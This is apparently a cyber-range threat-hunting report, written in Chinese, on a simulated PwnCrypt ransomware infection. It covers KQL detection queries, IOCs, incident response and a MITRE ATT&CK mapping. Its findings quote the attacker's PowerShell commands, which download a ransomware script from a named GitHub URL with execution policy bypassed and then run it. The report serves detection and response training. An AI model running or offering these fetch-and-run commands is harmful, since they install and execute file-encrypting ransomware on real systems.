ericaghdz/threat-hunting-scenario-pwncrypt-ransomware

# 威胁狩猎报告：PwnCrypt 勒索软件调查 # 使用的技术 - Microsoft Defender for Endpoint | Endpoint Detection & Response (EDR) 平台 - Kusto Query Language (KQL) | 日志查询与分析 - Microsoft Azure Virtual Machines (VM) # 网络安全框架 - MITRE ATT&CK Framework | 映射到相关的战术、技术和程序 (TTPs) ## 威胁狩猎前情报 ### 威胁概述 - **勒索软件家族：** PwnCrypt - **执行方式：** 基于 PowerShell 的 payload，用于加密受感染系统上的文件 - **加密标准：** AES-256 - **已知目标目录：** `C:\Users\Public\Desktop` - **行为：** 加密文件并在文件名前添加 `.pwncrypt` 扩展名 **示例：** ``` hello.txt → hello.pwncrypt.txt ``` ### 已知入侵指标 (IOCs) ``` *.pwncrypt.* ``` ### 相关威胁狩猎表 - `DeviceProcessEvents` - `DeviceFileEvents` ## 阶段 1：通过 DeviceFileEvents 验证 IOC 安全团队首先在 `DeviceFileEvents` 表中搜索已知的入侵指标 (IOC) `.pwncrypt`，以此展开调查。 ### 使用的查询 ``` // Checks for file events matching the PwnCrypt IOC let targetDevice = "windows-target-"; DeviceFileEvents | where DeviceName == targetDevice | where FileName contains ".pwncrypt" | project Timestamp, ActionType, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine | order by Timestamp desc ``` ### 调查结果 查询结果确认 `windows-target-1` 已受到 **PwnCrypt 勒索软件** 的影响。 识别出多个被加密的文件，包括： ``` 8876_EmployeeRecords.pwncrypt.csv 1706_ProjectList.pwncrypt.csv 8227_CompanyFinancials.pwncrypt.csv ``` 关联的启动进程持续显示出可疑的 PowerShell 执行： ``` powershell.exe -ExecutionPolicy Bypass -File C:\programdata\pwncrypt.ps1 ``` 在以下时间戳观察到 `pwncrypt.ps1` 的文件创建事件： ``` June 7, 2026 — 8:12:49 PM ET ``` 此时间戳被用作在 `DeviceProcessEvents` 表中进行深入调查的基准点。 ## 阶段 2：通过 DeviceProcessEvents 进行进程分析 执行了第二次查询，以识别在 `pwncrypt.ps1` 创建时间附近发生的进程执行情况。 ### 使用的查询 ``` // Check process logs surrounding pwncrypt.ps1 creation time let targetDevice = "windows-target-"; let specificTime = datetime(2026-06-08T00:12:49.5965458Z); DeviceProcessEvents | where DeviceName == targetDevice | where Timestamp between ((specificTime - 5m) .. (specificTime + 5m)) | project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName | order by Timestamp desc ``` ## 调查发现 ### 初始勒索软件准备活动 初始的勒索软件准备活动被识别于： ``` June 7, 2026 — 8:12:47 PM ET ``` 执行了以下 PowerShell 命令： ``` powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest ` -Uri https://raw.githubusercontent.com/joshmadakor/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/pwncrypt.ps1 ` -OutFile C:\programdata\pwncrypt.ps1 ``` 该命令使用 `Invoke-WebRequest` 将恶意的 `pwncrypt.ps1` payload 下载到： ``` C:\ProgramData\ ``` 此活动标志着 **勒索软件攻击的开始**，因为 payload 已成功部署到主机上。 ### 勒索软件执行 大约六秒钟后，使用以下命令执行了勒索软件 payload： ``` powershell.exe -ExecutionPolicy Bypass -File C:\programdata\pwncrypt.ps1 ``` 此执行事件启动了勒索软件加密过程，该过程负责重命名和加密先前在 `DeviceFileEvents` 表中观察到的文件。 ## 事件响应措施 确认存在勒索软件活动后，调查从威胁狩猎转入即时事件响应阶段。 执行了以下遏制和补救措施： - 受感染的主机 `windows-target-1` 已被隔离，以防止横向移动和获取额外的 payload，使用的是 Microsoft Defender XDR 的 **“隔离设备” (Isolate Device)** 功能。 - 恶意的 PowerShell 执行已被终止。 - 恶意文件 `pwncrypt.ps1` 已从主机中删除。 - 在整个环境中进行了额外的威胁狩猎，以识别任何进一步的入侵。结果显示感染仅限于 `windows-target-1`。 - 已知的良好备份恢复了被加密的文件。 ## MITRE ATT&CK TTP 映射 ### T1059.001 — PowerShell **解释：** PowerShell 使用 `ExecutionPolicy Bypass` 执行了 `pwncrypt.ps1` 以运行勒索软件。 ### T1105 — Ingress Tool Transfer **解释：** `Invoke-WebRequest` 将 PwnCrypt payload 下载到了受感染的系统上。 ### T1486 — Data Encrypted for Impact **解释：** 文件被加密并重命名为带有 `.pwncrypt` 扩展名。 ## 事件时间线 ``` 8:12:47 PM — PwnCrypt payload downloaded to host 8:12:49 PM — pwncrypt.ps1 written to disk 8:12:53 PM — ransomware execution initiated 8:12:54 PM+ — file encryption activity observed ``` ## 结论 威胁狩猎活动成功在 `windows-target-1` 上识别出了 **PwnCrypt 勒索软件**的指标。对 `DeviceFileEvents` 和 `DeviceProcessEvents` 的分析确认了从初始 payload 下载到勒索软件执行的攻击链。及时的遏制措施防止了横向扩散，恢复操作也成功从备份中恢复了受影响的文件。

标签：AI合规, Defender for Endpoint, KQL, OpenCanary, 勒索软件